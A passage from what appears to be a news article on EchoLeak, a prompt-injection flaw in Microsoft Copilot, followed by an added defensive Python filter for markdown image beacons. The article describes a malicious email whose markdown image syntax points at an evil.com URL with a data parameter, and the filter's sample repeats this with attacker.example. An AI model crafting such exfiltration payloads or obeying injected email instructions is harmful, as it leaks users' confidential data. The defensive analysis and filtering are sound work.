“That is sheer weaponization of AI’s core power, contextual understanding, against itself,” said Abhishek Anant Garg, an analyst at QKS Group. “Enterprise safety struggles because it’s built for malicious code, not language that appears innocent but acts like a weapon.”
This sort of vulnerability represents a big risk, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based services, it’s undoubtedly not the last we’ll see.”
EchoLeak’s exploit mechanism
EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=
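A defender-side check for the markdown syntax quoted above, as an added example that is not from the original article or from Microsoft's fix: it resolves reference-style and inline markdown images in untrusted text or assistant output and strips any that would load from a host outside an allowlist. The host names, the allowlist, the function names and the sample text are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# "[label]: url" definition at line start (optional <>, optional title).
REF_DEF = re.compile(r"^ {0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t]+.*)?$", re.M)
# "![alt][label]"; an empty label falls back to the alt text.
REF_IMG = re.compile(r"!\[([^\]]*)\]\[([^\]]*)\]")
# "![alt](url)" with an optional title.
INLINE_IMG = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)>?[^)]*\)")

ALLOWED_HOSTS = {"intranet.example.com"}  # assumption: hosts images may load from

SAMPLE = (  # constructed input, modelled on the syntax quoted in the article
    "Quarterly summary attached.\n\n"
    "![Image alt text][ref]\n\n"
    "[ref]: https://attacker.example?param=SECRET_PLACEHOLDER\n"
    "![logo](https://intranet.example.com/logo.png)\n"
)

def _label(m):
    return (m.group(2) or m.group(1)).strip().lower()

def _external(url, allowed):
    host = (urlsplit(url).hostname or "").lower()
    return bool(host) and host not in allowed  # relative URLs stay local

def _resolve(md):
    defs = {}
    for m in REF_DEF.finditer(md):
        # First definition wins, so a later benign duplicate cannot mask it.
        defs.setdefault(m.group(1).strip().lower(), m.group(2))
    return defs

def find_image_beacons(md, allowed=ALLOWED_HOSTS):
    """Return (url, query) for every image that would fetch from an unlisted host."""
    defs = _resolve(md)
    urls = [m.group(1) for m in INLINE_IMG.finditer(md)]
    urls += [defs[_label(m)] for m in REF_IMG.finditer(md) if _label(m) in defs]
    return [(u, urlsplit(u).query) for u in urls if _external(u, allowed)]

def neutralize(md, allowed=ALLOWED_HOSTS):
    """Replace flagged images and drop their definitions before rendering."""
    defs = _resolve(md)
    bad = {u for u, _ in find_image_beacons(md, allowed)}
    md = REF_IMG.sub(lambda m: "[image removed]" if defs.get(_label(m)) in bad else m.group(0), md)
    md = INLINE_IMG.sub(lambda m: "[image removed]" if m.group(1) in bad else m.group(0), md)
    return REF_DEF.sub(lambda m: "" if m.group(2) in bad else m.group(0), md)

if __name__ == "__main__":
    print(find_image_beacons(SAMPLE))
    print(neutralize(SAMPLE))
```

Shortcut references of the form `![label]` are not covered by these patterns; a production filter should work on the renderer's parsed output rather than on regular expressions.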